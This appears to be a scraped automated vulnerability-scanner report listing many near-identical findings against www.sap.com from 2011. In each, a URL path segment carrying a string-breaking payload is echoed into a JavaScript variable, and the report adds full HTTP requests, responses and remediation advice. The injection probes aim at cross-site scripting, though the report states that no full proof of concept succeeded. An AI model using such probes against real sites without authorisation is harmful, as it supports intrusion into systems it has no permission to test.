GET /communities/index.aspxbefcd%2522a%253d%2522b%2522a7ad0d78ceb HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 36090 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:09 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:09 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11235'%3bb3a98b94547 was submitted in the REST URL parameter 1. This input was echoed as 11235';b3a98b94547 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contactsap11235'%3bb3a98b94547/directory/ HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34137 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:06 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:06 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='contactsap11235';b3a98b94547'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1715c'%3b2afb3a939ff was submitted in the REST URL parameter 1. This input was echoed as 1715c';2afb3a939ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporate-en1715c'%3b2afb3a939ff/our-company/legal/copyright/ HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34311 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:09 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:09 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='corporate-en1715c';2afb3a939ff'; var DOCUMENTNAME='Error';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c7db'%3b1b431263886 was submitted in the REST URL parameter 2. This input was echoed as 4c7db';1b431263886 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporate-en/our-company4c7db'%3b1b431263886/legal/copyright/ HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 26485 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:14 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:14 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='our-company4c7db';1b431263886'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdc8'%3b7972640c05a was submitted in the REST URL parameter 1. This input was echoed as cfdc8';7972640c05a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalcfdc8'%3b7972640c05a/client_functions.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34196 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:04 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:04 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalcfdc8';7972640c05a'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a67'%3bfd99d1a36d0 was submitted in the REST URL parameter 1. This input was echoed as 17a67';fd99d1a36d0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global17a67'%3bfd99d1a36d0/css/Flyouts.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:02 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:02 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global17a67';fd99d1a36d0'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19826'%3b0257c2c66d3 was submitted in the REST URL parameter 1. This input was echoed as 19826';0257c2c66d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global19826'%3b0257c2c66d3/css/MainContentPanel.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34245 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:59 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:59 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global19826';0257c2c66d3'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35eda'%3bedbf9da7bbb was submitted in the REST URL parameter 1. This input was echoed as 35eda';edbf9da7bbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global35eda'%3bedbf9da7bbb/css/MainLeftPanel.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34208 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:59 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:59 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global35eda';edbf9da7bbb'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51e02'%3b12717624626 was submitted in the REST URL parameter 1. This input was echoed as 51e02';12717624626 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global51e02'%3b12717624626/css/MainRightPanel.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:02 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:02 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global51e02';12717624626'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8914c'%3b731e10a56e3 was submitted in the REST URL parameter 1. This input was echoed as 8914c';731e10a56e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global8914c'%3b731e10a56e3/css/dropdownlist.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:01 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:01 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global8914c';731e10a56e3'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b6eb'%3bb5fb07c6ddc was submitted in the REST URL parameter 1. This input was echoed as 7b6eb';b5fb07c6ddc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global7b6eb'%3bb5fb07c6ddc/css/rm_css/rm_iframe_css.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34268 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:56 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:56 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global7b6eb';b5fb07c6ddc'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49fd6'%3bdd65a3fcd1e was submitted in the REST URL parameter 1. This input was echoed as 49fd6';dd65a3fcd1e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global49fd6'%3bdd65a3fcd1e/js/FormEngine.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34174 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:43 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:43 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global49fd6';dd65a3fcd1e'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21ae8'%3b7885f86171f was submitted in the REST URL parameter 1. This input was echoed as 21ae8';7885f86171f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global21ae8'%3b7885f86171f/js/addthis_widget.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:39 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:39 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global21ae8';7885f86171f'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 494b8'%3b3f9e794eca6 was submitted in the REST URL parameter 1. This input was echoed as 494b8';3f9e794eca6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f57fc'%3bc7151b9655c was submitted in the REST URL parameter 1. This input was echoed as f57fc';c7151b9655c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalf57fc'%3bc7151b9655c/js/dropdownlist.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34188 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalf57fc';c7151b9655c'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b81'%3bb6b8c9dfd1 was submitted in the REST URL parameter 1. This input was echoed as c9b81';b6b8c9dfd1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalc9b81'%3bb6b8c9dfd1/js/jquery-1_3_2/jquery-1.3.2.min.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34321 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalc9b81';b6b8c9dfd1'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0692'%3bc051f703da5 was submitted in the REST URL parameter 1. This input was echoed as a0692';c051f703da5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globala0692'%3bc051f703da5/js/menu.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34116 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:46 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:46 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globala0692';c051f703da5'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adae'%3bc4f39aa5a5b was submitted in the REST URL parameter 1. This input was echoed as 8adae';c4f39aa5a5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
